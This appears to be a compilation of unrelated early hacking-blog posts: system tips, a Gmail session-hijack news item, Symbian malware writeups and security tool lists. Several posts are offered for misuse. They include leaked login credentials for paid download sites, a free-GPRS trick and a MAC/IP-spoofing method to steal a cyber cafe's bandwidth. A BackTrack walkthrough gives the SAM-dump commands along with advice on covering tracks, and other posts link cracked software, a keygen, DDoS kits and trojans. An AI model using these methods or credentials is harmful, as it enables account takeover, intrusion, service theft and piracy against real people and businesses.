When asked to most of the users “How will you uninstall Linux when it is Dual Boot installed with Windows XP?” The common answers we got was “Start windows XP and format Linux Partition“. Well they were half correct, you do have to format the linux partition but what about the grub loader? The grub loader will still be showing you the option to boot Linux during the start up and by mistake if anybody goes for booting linux, the system will not find any linux on your machine and it will restart. so what can you do in this situation?

There is a simple procedure to uninstall or delete linux completely and safely by following a step by step procedure illustrated below and it is tested by me .

Requirements:
You need a windows 98 startup disk or windows XP installation CD.

How to do it:

1. Reboot your laptop with windows 98 start up disc or Windows XP CD and type the command “fixmbr”.

2. Above command will repair ur bootloader and rewrite ntldr which will replace grub loader of Linux and now you can see only Windows XP in the boot menu.

3. Now Boot up in Windows xp.

4. Go to Start > Control Panel > Administrative Tools > Computer Management

5. Go to Disk Management under “Storage”

6. Select your Hard Disk and then the linux partition.

7. Delete the linux partition this will delete linux and grub.

8. Thats it done now boot your laptop or desktop normally it will be booted by default in windows xp.

If you have any problem in the procedure given above leave a comment here…

We all know that Firefox takes a lot of Time to load when it is run for the first time. Today I will show you a simple way to reduce this loading time and thus turn your slow firefox into fast firefox.

You can slash Firefox’s slow load time by compressing the DLLs and executables. There are many choices for compression but I suggest you use UPX which is free, efficient and time proven.


1. Download UPX from http://upx.sourceforge.net/#download
2. Unzip upx.exe into your Firefox installation folder which is normally C:\Program Files\Mozilla Firefox.

3. Make sure Firefox is not running then shell to a command prompt in the Firefox installation directory.

4. Type in the following command in a single line and hit return:

for %v in (*.exe *.dll components\*.dll plugins\*.dll) do upx “C:\Program Files\Mozilla Firefox\%v”

5. If on some later occasion you want to unpack the files, just type in the command above but add the decompression switch “-d” after “do upx.”

That’s it; enjoy the difference!

A tool that automatically steals IDs of non-encrypted sessions and breaks into Google Mail accounts has been presented at the Defcon hackers’ conference in Las Vegas.

Last week Google introduced a new feature in Gmail that allows users to permanently switch on SSL and use it for every action involving Gmail, and not only, authentication. Users who did not turn it on now have a serious reason to do so as Mike Perry, the reverse engineer from San Francisco who developed the tool is planning to release it in two weeks.

When you log in to Gmail the website sends a cookie (a text file) containing your session ID to the browser. This file makes it possible for the website to know that you are authenticated and keep you logged in for two weeks, unless you manually hit the sign out button. When you hit sign out this cookie is cleared.

Even though when you log in, Gmail forces the authentication over SSL (Secure Socket
Layer), you are not secure because it reverts back to a regular unencrypted connection after the authentication is done. According to Google this behavior was chosen because of low-bandwidth users, as SLL connections are slower.

The problem lies with the fact that every time you access anything on Gmail, even an image, your browser also sends your cookie to the website. This makes it possible for an attacker sniffing traffic on the network to insert an image served from http://mail.google.com and force your browser to send the cookie file, thus getting your session ID. Once this happens the attacker can log in to the account without the need of a password. People checking their e-mail from public wireless hotspots are obviously more likely to get attacked than the ones using secure wired networks. Todd Mumford, from the SEO company called SEO Visions Inc, states “This can be a serious problem for Internet Marketers
who travel often and use their wireless laptops and Gmal services often and do not always have access to a secure connection”

Perry mentioned that he notified Google about this situation over a year ago and even though eventually it made this option available, he is not happy with the lack of information. “Google did not explain why using this new feature was so important” he said. He continued and explained the implications of not informing the users, “This gives people who routinely log in to Gmail beginning with an https:// session a false sense of security, because they think they’re secure but they’re really not.”

If you are logging in to your Gmail account from different locations and you would like to benefit from this option only when you are using unsecured networks, you can force it by manually typing https://mail.google.com before you log in. This will access the SSL version of Gmail and it will be persistent over your entire session and not only during authentication.

I have been asked by many Vodafone Users to post a Method to get a free GPRS for the Vodafone. Nobody wants to pay for what he/she uses. I am also a Nobody so I was also in trying out all the things to get free GPRS for Vodafone users since I am also a Vodafone User. Finally I have got a Full proof way to get free GPRS for all the Vodafone Users. This method has been tested on different mobiles and has been confirmed to be working. Still if anybody faces any problem please contact me and I will try to solve it as quickly as possible.



Followng are the Settings you require to configure on your Mobile:

Account Name: Vodafone_gprs
Homepage: http://live.vodafone.in
User Name: (no need)
Pass: (no need)

Access Point Settings:

Proxy: Enabled
Proxy Address: 10.10.1.100
Proxy Port: 9401
Data Bearer: Packet Data

Bearer Settings:

Packet Data Access Point: portalnmms
Network type: IPV4
Authentication: normal
User Name: (no need)
Password: (no need)

*IF that happen this settings is not working then change the proxy port number to:-

Proxy Port: 9401

Following are the list of usernames and passwords of the premium accounts for Best downloads sites.
…!! ENJOY !!…
!!…100% Working Accounts…!!

1.) www.divxcrawler.com {download movies fastly}

Username : divx273
Password : 8342729

2.) www.butterflydownloadnetwork.com {movies, music, Pc Games, Tv shows}

Username : cinemanetwork20
Password : butterfly20

3.) www.downloadprofessional.com {movies,Pc softwares, Pc Games, Tv shows}

Username : lo886Ees
Password : zAgt88er

4.) www.sharingzone.net {movies, Pc softwares, Pc Games}

Username : LODMQYHX
Password : 375021402
Receipt : 4T5W89RD

5.) www.unlimitedgamedownloads.com {movies, Pc Games, psp softwares}

Username : ga20me
Password : ke01feb

6.) www.watchdirect.tv {movies, music, Pc Games, online Tv}

Username : cinemanetwork20
Password : butterfly20

7.) www.fullreleasez.com {Greatly Every thing}

Username : Af872HskL
Password : XjsdH28N

8.) www.fulldownloads.us {Greatly Every thing}

Username : Af872HskL
Password : XjsdH28N

9.) www.pirateaccess.com {Every thing}

Username : yourfrienddalat@gmail.com
Password : CHh5LKPI

Username : xxx_heel_xxx@yahoo.com
Password : MJY0BUY

Username : i_l0ve_u_786@yahoo.com
Password : rYvLgPrt

Username : mubashar_siddique@yahoo.com
Password : F9Gzgwb5

10.) www.warezquality.com {Every thing}

Username : ageg2020
Password : z8fsDfg3

11.) wwww.warezreleases.com {All Stuff}

Username : HnRPxKQz
Password : a59KBV7

Username : a25bipZP
Password : 1TeVnoJb

Username : SHYyJfWU
Password : P4K20uO

12.) www.fulldownloadaccess.com {All Stuff}

Username : mpuv3y
Password : umvpy3x

13.) www.alphaload.com {All Stuff}

Username : AL3429352
Password : ykbcKTNS

Username : AL3429355
Password : RCHAbhKM

Username : AL3429350
Password : gMZNFcyS

Username : AL3429351
Password : cTAkWAxc

Username : AL3429352
Password : ykbcKTNS

14) www.gamedownloadnow.com {All Stuff}

Username : ga20me
Password : ke01feb

15.) www.unlimiteddownloadcenter.com {All Stuff}

Username : cu20me
Password : ke01feb

16.) www.tvadvanced.com {online Tv}

Username : mv03dl
Password : frmvdl

It takes only an inch in your pocket to carry a Pen Drive :-) Along this post, we’ll see how Backtrack Distro loaded into a Pen Drive or a Live CD can wreck havoc on a Windows machine in just 10 minutes.

The Backtrack Live CD can be a golden resource in bypassing the preloaded Windows XP, it cuts in a way for the hacker to gain access to your native partitions without caring about the original OS.

To perform the below experiment you need

1. BackTrack ISO. Download here

2. Some ISO Burning Program .Download Magic ISO here

3. A little common sense :-)

Aim of the article is to shed the myth about Windows XP security. Just having a copy of password protected Operating system loaded on your system doesn’t guarantee privacy.

Minute 1

Your computer is open to physical access. For some unethical reason the finds the machine worth attacking.

* The Hacker inserts bootable USB BackTrack Linux Pen Drive / or Live CD in the machine. If the default first boot device is HDD, he goes to BIOS and changes it to USB / CD



Minute 5

After setting the First boot device as USB / CD . He slices in his Backtrack Live OS CD and boots into the Backtrack GUI.




The process followed above tells the machine to skip the operating system loaded onto the HardDisk (in this case we skip MS-WinXP and to boot up BackTrack)

Minute 7

BlackHat Action one

Dump the SAM file

A Windows XP machine usually stores passwords in SAM files stored locally in the X:/WINDOWS/System32/config/system directory. The encrypted file is protected from getting copied/viewed while the user is logged on in Windows XP.

However, by booting the system using a Live CD makes the files wide accessible to the attacker.
Which can be cracked ! by using proper tools :-)

# cd /mnt/hda1/WINDOWS/System32/config
# cp SAM /temp
# cp system /temp
# cd /temp
# bkhive system key
# samdump2 SAM key > /temp/passwords.txt

Black Hat Action Two

Kill that SAM

Owing to the cryptographic limitations, a black hat hacker might not be able to crack the Password (if the length is large). In those cases he might want to remove/disable it !

In most usual cases as far as I’ve tried http://home.eunet.no/pnordahl/ntpasswd/ works great. A cracker just has to burn that .ISO image onto a blank CD and boot the system from it.

By navigating through the text menus and doing as per the onscreen instructions, it
is trivial to reset a chosen user’s password or promote an existing user to Administrator privileges.



In the above image you may see the Password reset option which resets the WinXP password to blank.

Next screenshot shows that the password has been reset to blank.

After using the machine as an administrator, the malicious hacker makes sure to restore back the original SAM file so as clean up the evidence.

# cd /mnt/hda1/WINDOWS/System32/config
# cp SAM /mnt/sda1/
# cp system /mnt/sda1/


Cleaning up the tracks to evade detection

Cracking something might be easy, and so is getting caught.

Usually , a clever black hat takes the backup of original SAM file so that he might restore these files after the attack is finished. Installing a backdoor might be easy , but chances are that the authorized administrator of the compromised system might detect it. In that case its obivious, it will be quickly closed. Popular techniques to ensure successful backdoors include to use an alredy open port. Although, well configured Windows XP keeps logs of users when they access the system and run programs. There are built in programs in Backtrack that assist in log file modification.

WHITE HAT TIP: How to Prevent this happening to you…

* Keep the HardDrives encrypted. Who knows what the attacker might do from your sensitive and personal data

* by disallowing physical access to a system by an attacker. The cardinal rule that physical access equals total access exists for a reason.

* Keep a BIOS Password and Set the HDD as the first bootable device. This’ll prevent cracker from booting your system with a Live CD or USB disk.

* Keep strong passwords. This should mitigate the risk of having the password cracked by Dictionary attacks. Moreover it’ll make the BruteForce attack infeasible.

Hail Open Source

If you like the above post , great :-) Please share .



If you use internet via a LAN medium, and the network administrator has imposed restrictions on your downloading/uploading speed, then READ ON-

This hack has been tried on Sify internet, Spectranet. I am sure it will work with any internet connection which uses a LAN topology to connect you to internet. [ This hack doesn't work for ADSL]

The principle: The Network admin binds your IP address to a MAC address and sets the speed limit. If the MAC address and IP Address is changed to that of someone who’s paying for the higher speed, you’ll get a speed jump.

When I tried this hack, I was subscribed to “ABC” internet, a local provider in the area. I was paying $ 20 a month for a slow 64 kbps connection. With this hack I could raise it to 512 kbps with no downloading restrictions imposed :-)

1. I first used Angry IP Scanner to scan my subnet to find the Alive IP address in my local LAN. 1. I used some social engineering to find out which IP address was getting how much speed. I chose a local cyber cafe as my target , which used to close at 11 PM and open at 10 Am in the morning. The cybercafe’s IP address was 192.168.0.32 and MAC Address was AA:XX:XX:Xl . It’s obvious that the cyber cafe owner must have subscribed for a high speed line.
2. Around 11.15 PM i used to ping the cybercafe’s IP to find whether it’s using still open or not.
3. As soon as I find that its closed, I used the technique below to forge my MAC Address to that of the cybercafe
4. To confirm weather the MAC has been changed or not, I used to use ipconfig/all command in DOS.
5. Thereafter the only step that would remain is to change my IP adress to that of the CyberCafe’s server, 192.168.0.32 . In case you try this hack, do make sure weather the system of your prey is not connected to internet. Not doing so might result in an IP conflict which can alarm the Network Admins.
6. This will emulate your machine as that of the Cybercafe server, which luckily fools the Administrator Server to broadcast a speedier connection to you (say 512kbps or 2mbps).

If the above fails: In some cases your network provider might ask for a username password via a web-login interface. In that case you can use a sniffer ( CAIN, Wireshark) so as to sniff for the usernames and passwords.

The result in my case:





PicaSafe 2.0.207 | 5 MB

Wanna hide that naughty photos away from the curious eye? Try PicaSafe! There are hundreds of ways to hide your private photos on the computer but only one of them is really safe. Protect your collections of digital photos with PicaSafe! Keep. Watch. Hide. Only you control who can see your pictures.

Platform: MS Windows XP / Vista / 7
Languages: English, Spanish, Russian

Download:
http://rapidshare.com/files/241362808/PicaSafe.v2.0.207.rar
Or
http://www.megaupload.com/?d=IY005ILD

The Next-Generation Burning Application for the Linux OS

box-nerolinux-96 (18601 Byte) Nero Linux 3 is the definitive burning application for the Linux operating system. Based on the award-winning current Nero Burning ROM platform, Nero Linux 3 is the most powerful and versatile burning application available for Linux, and the only application to offer Blu-ray Disc and HD DVD data burning support.

Experience the most comprehensive burning application for the Linux OS

* Enjoy the same functionalities as in the newest version of Nero Burning ROM
* Burn data using any optical disc format, including CD, DVD, Blu-ray Disc, and HD DVD
* Ensure a quick and easy setup using SmartDetect automatic drive support
* Manage your music collection with integrated audio capabilities such as high speed digital audio extraction and FreeDB, which automatically searches for disc information over the Internet

System Requirements

General

* Linux kernel 2.4 or higher (2.6 recommended) with X-Window
* Glibc 2.3.2 and libstdc++ 6 3.4
* GTK+ 2.4.10 (or higher)

Processor and installed memory

* 800 MHz Intel� Pentium� III processor, AMD Sempron� 2200+ processors or equivalent, 128 MB RAM

Hard disc space

* 50 MB for program installation

Optical device

* CD, DVD, Blu-ray, or HD DVD recordable or rewritable drive for burning

Supported Distributions*

* Red Hat Enterprise Linux 4
* SuSE Linux 10.0
* Fedora 4
* Debian GNU/Linux 3.1
* Ubuntu 5.10
* Linspire 6.0.x

* Nero Linux 3 supports all higher versions of the above supported distributions
nerolinux-3.5.2.3-x86


1] Install NeroLinux 3.5.1.0
2] Copy the Keygen to Home Directory
3] open Terminal
4] chmod a+x keygen
5] ./keygen
6] Copy the Serial And Paste.....

Enjoy!!!!!!!!!


Code: [Check Download Links]

http://rapidshare.com/files/189646227/Nero_Linux_3.rar






Modify photos to simulate virtual plastic surgery results."
BrothersoftEditor: The VPSS is a simple to use, yet powerful photo warping software that will let you modify photos to simulate virtual plastic surgery results on anyone's face and body. As a specific purpose software, we developed a custom and convenient interface more suited for virtual plastic surgery simulation than anything you will find on general purpose, thousand dollars traditional software suits.

CODE
http://uploading.com/files/31VMV04O/Virtual.Plastic.Surgery.Software.v1.2.0.1484.Cracked-iNViSiBLE.rar.html

CODE
http://depositfiles.com/files/tqi1cfywd

Description:

This type of mobile virus is very interesting that it'll steal user phonebook data and then it will compile it into a text file and sent it through
bluetooth without user confirmation.

So far, this is the first Symbian Virus that I've seen that it will steal user data without
user confirmation and sent thorogh other bluetooth supported devices.





Analysis/Observation:

This trojan was distributed in an application file and it is spreading in pbexplorer.SIS.

Symtomps:

When user try to install this suspicious *.SIS file, the image shown below is screenshoot taken during installation process:

http://img369.imageshack.us/img369/9507/8f209da05hb.jpg

After installation complete, the application has set to run automatically and will display the following text:

________________
| Phone Book |
| Compacting |
| by: lajel 202u |
| |
| please wait... |
|________________|

________________________
| Compacting |
| your contact(s),step 2 |
| |
| Please wait again |
| until done... |
|________________________|

After the malicious process done, it will pop out a message:

"Done!!!"

If user press [OK] the malicious program will ended itself and after some times,
it will start searching for bluetooth devices and sent all phonebook information in
text file via bluetooth.


Prevention:

This malware requires that the user intentionally install them upon the device. As always, users should never install third party application from unknown site.
SYMBIAN TROJAN--Mabtal.A....
Profimail v2.75_FULL.SIS/SymbOS Mabtal.A is a SIS file malware that pretends to be a cracked version of Profimail which is a very popular E-Mailing third party application in Symbian Platform, in fact, it is a malware which drops Mabir.A, Caribe and Fontal variants into the phone system, besides, it also drops some corrupted binaries file which causing the phone auto-restart and showing fatal error message. Next the phone will fail to boot-up permanently.


Positive analysis results:

While tested using the above handsets, both platform was affected. When user tries to install the suspicious file into his phone, it will look like the below image:

user posted image

While installing the suspicious file, it will show a message as shown below:
http://img268.imageshack.us/img268/2144/317e79031ih.th.jpg


This suspicious file automatically installed all files into the phone memory. Cabir virus will start spreading via bluetooth and keeps listening if any incoming message arrives in the phone, when any SMS/MMS message arrives in the phone, mabir.A virus will immediately sent itself out via MMS for spreading purpose.

When user tries to access the Profimail and ProfiExplorer third party application, it may display an error message as shown below:
http://img268.imageshack.us/img268/7508/76ff985d6zw.th.jpg

After it has successfully restart, due to the corrupted fonts, the device can't boot up permanently.

By using the hash-number-matching method, the following files was proved to be a malware files while analyzing work is in progress:

11x12 euro_fonts.gdr detected as SymbOS.Fontal.A
CARIBE0.APP detected as SymbOS.Mabir.A
CARIBE0.RSC detected as SymbOS.Cabir
flo0.mdl detected as SymbOS.Mabir.A
flo.mdl detected as SymbOS.Mabir.A
caribe.app detected as SymbOS.Mabir.A
caribe.rsc detected as SymbOS.Cabir
Appinst.app detected as SymbOS.Cabir.U2
Appinst.aif detected as SymbOS.Cabir.U2


This malware doesn't come with any valid digital certificate but it can replicate itself via bluetooth or MMS(Mabir.A) and it will cause severe damage to Symbian OS 6.1 handsets!


SplinterCell-ChaosTheory_S60_cracked-XiMPDA.SIS OR SymbOS/Skudoo.A..


This is a Series 60 trojan that installs skulls trojan, MGdropper, Commwarrior, Doomboot.A and cabir into the targeted device. When this trojan executed, most of application in the phone being replaced by a non-functional or corrupted files by the trojan into the phone, causing application can't run as usual. It fails to attack NOKIA 6680 while the phone has been restarted. Anyway, McAfee AVERT mentioned that this trojan will cause the phone fail to reboot on the next restart by the user.

It is also the first mobie trojan in the world which capable propagates MGDropper virus and Commwarrior virus vice-versa.

It contains also the image as shown below while I have extracted the *.SIS file:
http://i21.photobucket.com/albums/b261/McAfee88/aa.gif

Some of the blank icon that the trojan drops actually is coded to auto restart the phone, when the phone has been restarted, the menu function of the phone can't no longer be function and thus this totally lock the whole phone.

When user tries to installs the trojan into the phone, the symptoms are as shown below:
http://i21.photobucket.com/albums/b261/McAfee88/P1010045.jpg

While installing the suspicious file into the phone, it will pop up a message as shown below:
http://i21.photobucket.com/albums/b261/McAfee88/ccb3703e.jpg



--: Port Scanners :--

Nmap :- This tool developed by Fyodor is one of the best unix and windows based port scanners. This advanced port scanner has a number of useful arguments that gives user a lot of control over the process.

http://www.insecure.org/nmap



Superscan :- A Windows-only port scanner, pinger, and resolver
SuperScan is a free Windows-only closed-source TCP/UDP port scanner by Foundstone. It includes a variety of additional networking tools such as ping, traceroute, http head, and whois.

http://www.foundstone.com/



Angry IP Scanner :- A fast windows IP scanner and port scanner. Angry IP Scanner can perform basic host discovery and port scans on Windows. Its binary file size is very small compared to other scanners and other pieces of information about the target hosts can be extended with a few plugins.

http://www.angryziber.com/ipscan/



Unicornscan :- Unicornscan is an attempt at a User-land Distributed TCP/IP stack for information gathering and correlation. It is intended to provide a researcher a superior interface for introducing a stimulus into and measuring a response from a TCP/IP enabled device or network. Some of its features include asynchronous stateless TCP scanning with all variations of TCP flags, asynchronous stateless TCP banner grabbing, and active/passive remote OS, application, and component identification by analyzing responses.

http://www.unicornscan.org/



--: O.S. Fingerprinting Tools :--

Nmap :- This tool developed by Fyodor is one of the best unix and windows based active os fingerprinting tool.

http://www.insecure.org/nmap



P0f :- A passive OS fingerprinting tool. P0f is able to identify the operating system of a target host simply by examining captured packets even when the device in question is behind an overzealous packet firewall.P0f can detect firewall presence, NAT use, existence of load balancers, and more!

http://lcamtuf.coredump.cx/p0f.shtml




Xprobe2 :- Active OS fingerprinting tool. XProbe is a tool for determining the operating system of a remote host. They do this using some of the same techniques as Nmap as well as some of their own ideas. Xprobe has always emphasized the ICMP protocol in its fingerprinting approach.

http://www.sys-security.com/index.php?page=xprobe


--: Password Crackers :--

Cain and Abel :- The top password recovery tool for Windows. This Windows-only password recovery tool handles an enormous variety of tasks. It can recover passwords by sniffing the network, cracking encrypted passwords using Dictionary, Brute-Force and Cryptanalysis attacks, recording VoIP conversations, decoding scrambled passwords, revealing password boxes, uncovering cached passwords and analyzing routing protocols.

http://www.oxid.it/cain.html



John the Ripper :- A powerful, flexible, and fast multi-platform password hash cracker. John the Ripper is a fast password cracker, currently available for many flavors of Unix, DOS, Win32, BeOS, and OpenVMS. Its primary purpose is to detect weak Unix passwords. It supports several crypt(3) password hash types which are most commonly found on various Unix flavors, as well as Kerberos AFS and Windows NT/2000/XP LM hashes. Several other hash types are added with contributed patches.

http://www.openwall.com/john/



THC Hydra :- A Fast network authentication cracker which support many different services. When you need to brute force crack a remote authentication service, Hydra is often the tool of choice. It can perform rapid dictionary attacks against more then 30 protocols, including telnet, ftp, http, https, smb, several databases, and much more.

http://www.thc.org/thc-hydra/



L0phtcrack :- Windows password auditing and recovery application
L0phtCrack, also known as LC5, attempts to crack Windows passwords from hashes which it can obtain (given proper access) from stand-alone Windows NT/2000 workstations, networked servers, primary domain controllers, or Active Directory. In some cases it can sniff the hashes off the wire. It also has numerous methods of generating password guesses (dictionary, brute force, etc).

http://www.l0pht.com

RainbowCrack :- An Innovative Password Hash Cracker.
The RainbowCrack tool is a hash cracker that makes use of a large-scale time-memory trade-off. A traditional brute force cracker tries all possible plaintexts one by one, which can be time consuming for complex passwords. RainbowCrack uses a time-memory trade-off to do all the cracking-time computation in advance and store the results in so-called "rainbow tables". It does take a long time to precompute the tables but RainbowCrack can be hundreds of times faster than a brute force cracker once the precomputation is finished.

http://www.antsight.com/zsl/rainbowcrack/



Brutus :- A network brute-force authentication cracker
This Windows-only cracker bangs against network services of remote systems trying to guess passwords by using a dictionary and permutations thereof. It supports HTTP, POP3, FTP, SMB, TELNET, IMAP, NTP, and more.

http://www.hoobie.net/brutus/



Nessus :- Premier UNIX vulnerability assessment tool
Nessus is the best free network vulnerability scanner available, and the best to run on UNIX at any price. It is constantly updated, with more than 11,000 plugins for the free (but registration and EULA-acceptance required) feed. Key features include remote and local (authenticated) security checks, a client/server architecture with a GTK graphical interface, and an embedded scripting language for writing your own plugins or understanding the existing ones.

http://www.nessus.org/



GFI LANguard :- A commercial network security scanner for Windows
GFI LANguard scans IP networks to detect what machines are running. Then it tries to discern the host OS and what applications are running. I also tries to collect Windows machine's service pack level, missing security patches, wireless access points, USB devices, open shares, open ports, services/applications active on the computer, key registry entries, weak passwords, users and groups, and more. Scan results are saved to an HTML report, which can be customized/queried. It also includes a patch manager which detects and installs missing patches.

http://www.gfi.com/lannetscan/



Retina :- Commercial vulnerability assessment scanner by eEye
Like Nessus, Retina's function is to scan all the hosts on a network and report on any vulnerabilities found. It was written by eEye, who are well known for their security research.

http://www.eeye.com/html/Products/Retina/index.html



Core Impact :- An automated, comprehensive penetration testing product. it is widely considered to be the most powerful exploitation tool available. It sports a large, regularly updated database of professional exploits, and can do neat tricks like exploiting one machine and then establishing an encrypted tunnel through that machine to reach and exploit other boxes.

http://www.coresecurity.com/products/coreimpact/

ISS Internet Scanner :- Application-level vulnerability assessment
Internet Scanner started off in '92 as a tiny open source scanner by Christopher Klaus. Now he has grown ISS into a billion-dollar company with a myriad of security products.

http://www.iss.net/products_services/enterprise_protection
/vulnerability_assessment/scanner_internet.php





--: Packet Sniffers :--

Ethereal :- This (also known as Wireshark) is a fantastic open source network protocol analyzer for Unix and Windows. It allows you to examine data from a live network or from a capture file on disk. You can interactively browse the capture data, delving down into just the level of packet detail you need. Ethereal has several powerful features, including a rich display filter language and the ability to view the reconstructed stream of a TCP session. It also supports hundreds of protocols and media types.

http://www.ethereal.com/



Kismet :- A powerful wireless sniffer. Kismet is a console based 802.11 layer2 wireless network detector, sniffer, and intrusion detection system. It identifies networks by passively sniffing, and can even decloak hidden networks if they are in use. It can automatically detect network IP blocks by sniffing TCP, UDP, ARP, and DHCP packets, log traffic in Wireshark/TCPDump compatible format, and even plot detected networks and estimated ranges on downloaded maps.

http://www.kismetwireless.net/



Tcpdump :- The classic sniffer for network monitoring and data acquisition. It is great for tracking down network problems or monitoring activity. There is a separate Windows port named WinDump. TCPDump is the source of the Libpcap/WinPcap packet capture library.

http://www.tcpdump.org/



Ettercap :- Ettercap is a terminal-based network sniffer/interceptor/logger for ethernet LANs. It supports active and passive dissection of many protocols (even ciphered ones, like ssh and https). Data injection in an established connection and filtering on the fly is also possible, keeping the connection synchronized. Many sniffing modes were implemented to give you a powerful and complete sniffing suite. Plugins are supported. It has the ability to check whether you are in a switched LAN or not, and to use OS fingerprints (active or passive) to let you know the geometry of the LAN.

http://ettercap.sourceforge.net/

Dsniff :- A suite of powerful network auditing and penetration-testing tools. This popular and well-engineered suite by Dug Song includes many tools. dsniff, filesnarf, mailsnarf, msgsnarf, urlsnarf, and webspy passively monitor a network for interesting data (passwords, e-mail, files, etc.). arpspoof, dnsspoof, and macof facilitate the interception of network traffic normally unavailable to an attacker (e.g, due to layer-2 switching). sshmitm and webmitm implement active monkey-in-the-middle attacks against redirected ssh and https sessions by exploiting weak bindings in ad-hoc PKI. Overall, this is a great toolset. It handles pretty much all of your password sniffing needs.

http://www.monkey.org/~dugsong/dsniff/




--: Encryption Tools :--

GnuPG / PGP :- Secure your files and communication with the advanced encryption. PGP is the famous encryption program by Phil Zimmerman which helps secure your data from eavesdroppers and other risks. GnuPG is a very well-regarded open source implementation of the PGP standard (the actual executable is named gpg). While GnuPG is always free, PGP costs money for some uses.

http://www.gnupg.org/
http://www.pgp.com/



OpenSSL :- The premier SSL/TLS encryption library. The OpenSSL Project is a collaborative effort to develop a robust, commercial-grade, full-featured, and open source toolkit implementing the Secure Sockets Layer (SSL v2/v3) and Transport Layer Security (TLS v1) protocols as well as a full-strength general purpose cryptography library. The project is managed by a worldwide community of volunteers that use the Internet to communicate, plan, and develop the OpenSSL toolkit and its related documentation.

http://www.openssl.org/



Tor :- An anonymous Internet communication system Tor is a toolset for a wide range of organizations and people that want to improve their safety and security on the Internet. Using Tor can help you anonymize web browsing and publishing, instant messaging, irc, ssh, and other applications that use the TCP protocol. Tor also provides a platform on which software developers can build new applications with built-in anonymity, safety, and privacy features.

http://tor.eff.org/



Stunnel :- A general-purpose SSL cryptographic wrapper. The stunnel program is designed to work as an SSL encryption wrapper between remote client and local or remote server. It can be used to add SSL functionality to commonly used inetd daemons like POP2, POP3, and IMAP servers without any changes in the programs' code.

http://www.stunnel.org/

OpenVPN :- A full-featured SSL VPN solution. OpenVPN is an open-source SSL VPN package which can accommodate a wide range of configurations, including remote access, site-to-site VPNs, WiFi security, and enterprise-scale remote access solutions with load balancing, failover, and fine-grained access-controls. OpenVPN implements OSI layer 2 or 3 secure network extension using the industry standard SSL/TLS protocol, supports flexible client authentication methods based on certificates, smart cards, and/or 2-factor authentication, and allows user or group-specific access control policies using firewall rules applied to the VPN virtual interface. OpenVPN uses OpenSSL as its primary cryptographic library.

http://openvpn.net/



TrueCrypt :- Open-Source Disk Encryption Software for Windows and Linux. TrueCrypt is an excellent open source disk encryption system. Users can encrypt entire filesystems, which are then on-the-fly encrypted/decrypted as needed without user intervention beyond entering their passphrase intially. A clever hidden volume feature allows you to hide a 2nd layer of particularly sensitive content with plausible deniability about whether it exists. Then if you are forced to give up your passphrase, you give them the first-level secret. Even with that, attackers cannot prove that a second level key even exists.

http://www.truecrypt.org/



Ankit Fadia Certified Ethical Hacker (AFCEH) 3.0
AFCEH TOP HACKING TOOLS LIST*
Information Gathering
Nmap http://nmap.org/
RemOS http://www.zoneh.
org/component/option,com_remository/Itemid,47/func,download/id,4215/chk,9e10fc8dccdcd4f0
17e372247cc8fa31
P0f lcamtuf.coredump.cx/p0f.shtml
MingSweepe
r
http://www.hoobie.net/mingsweeper/
THC Amap http://freeworld.thc.org/thc-amap/
Angry IP
Scanner
http://www.angryziber.com/w/Download
Unicornscan http://sourceforge.net/projects/osace
Samspade http://samspade.org/
Strobe http://packetstormsecurity.org/UNIX/scanners/strobe-1.04.tgz
Netcat http://netcat.sourceforge.net/
Superscan http://www.foundstone.com/us/resources/proddesc/superscan.htm
SQL Scan http://www.foundstone.com/us/resources/proddesc/sqlscan.htm
ipEye http://www.ntsecurity.nu/toolbox/ipeye/
Nuke
Nabber
http://packetstormsecurity.org/MSDOS/audit/nn29b.exe
Snort http://www.snort.org
Trout http://www.foundstone.com/us/resources/proddesc/trout.htm
Hping2 http://www.hping.org/
XProbe2 http://www.sys-security.com/index.php?page=xprobe
EtherPeek
(now known
OmniPeek)
http://www.wildpackets.com/
DDOSPing http://www.foundstone.com/us/resources/proddesc/ddosping.htm
Proxy Servers
Wingate http://www.wingate.com/
WinProxy http://www.winproxy.com/
MultiProxy http://www.multiproxy.org/
Socks Chain
Proxy
http://www.sockschain.com/socks/
DOS Attacks
Trin00 Google Search
TFN http://packetstormsecurity.org/groups/mixter/tfn.tgz
Stacheldraht http://packetstormsecurity.org/distributed/stachel.tgz
Sniffers
Tcpdump http://sourceforge.net/projects/tcpdump/
Ethereal http://www.wireshark.org/download.html
DSniff http://monkey.org/~dugsong/dsniff/
Password Cracking
Brutus http://www.hoobie.net/brutus/brutus-download.html
Ankit Fadia Certified Ethical Hacker (AFCEH) 3.0
L0phtcrack http://packetstormsecurity.org/NT/audit/l0phtcrack.zip
100+ Types
of Passwords
http://www.lostpassword.com/
Cain and
Abel
http://www.oxid.it/cain.html
John the
Ripper
http://www.openwall.com/john/
THC Hydra http://www.thc.org/thc-hydra/
Tracing Tools
Visualroute http://visualroute.visualware.com
EmailTracke
rPro
http://www.emailtrackerpro.com
3D
Traceroute
http://www.d3tr.de/
NeoTrace http://download1us.softpedia.com/dl/4d61efc43ee174753225f758e8908c8f/488c61d5/100000042/
software/network/mvt325_30-Day.zip
Firewalk http://www.packetfactory.net/projects/firewalk/
Trojans
Netbus http://packetstormsecurity.org/trojans/NetBus170.zip
Girlfriend http://packetstormsecurity.org/trojans/gf135.zip
Back
Orrifice
http://www.bo2k.com/
HoneyPots
Back Officer
Friendly
http://www.nfr.com/products/bof/
Specter http://www.specter.com/
Honeyd http://www.honeyd.org/
Honeytrap http://honeytrap.sourceforge.net/
Sebek https://projects.honeynet.org/sebek/
Nepenthes http://www.mwcollect.org/
Misc
True Crypt http://www.truecrypt.org/
SysInternals http://technet.microsoft.com/en-us/sysinternals/0e18b180-9b7a-4c49-
8120-c47c5a693683.aspx
Tripwire http://www.tripwire.com/
Netcat http://www.vulnwatch.org/netcat/
Restoration http://www.snapfiles.com/download/dlrestoration.html
Security Audit
Nessus http://www.nessus.org/
GFI
Languard
http://www.gfi.com/lannetscan/
Retina http://www.eeye.com/html/products/retina/index.html
Core Impact http://www.coresecurity.com/
ISS Internet
Scanner
http://www.iss.net/
Ankit Fadia Certified Ethical Hacker (AFCEH) 3.0
SAINT http://www.saintcorporation.com/saint/
SARA http://www-arc.com/sara/
Paros Proxy http://www.parosproxy.org/
Wikto http://www.sensepost.com/research/wikto/
Whisker http://www.wiretrip.net/rfp/
Linux
Knoppix http://www.knoppix.net/
Ubuntu http://www.ubuntu.com/
PCLinuxOS http://www.pclinuxos.com/
Shell Accounts
http://www.prunk.be/mediawiki/index.php/Free_List
http://freeshell.vilasta.com/freeshellaccount.html
http://www.freeshells.info/
http://www.ductape.net/~mitja/freeunix.shtml
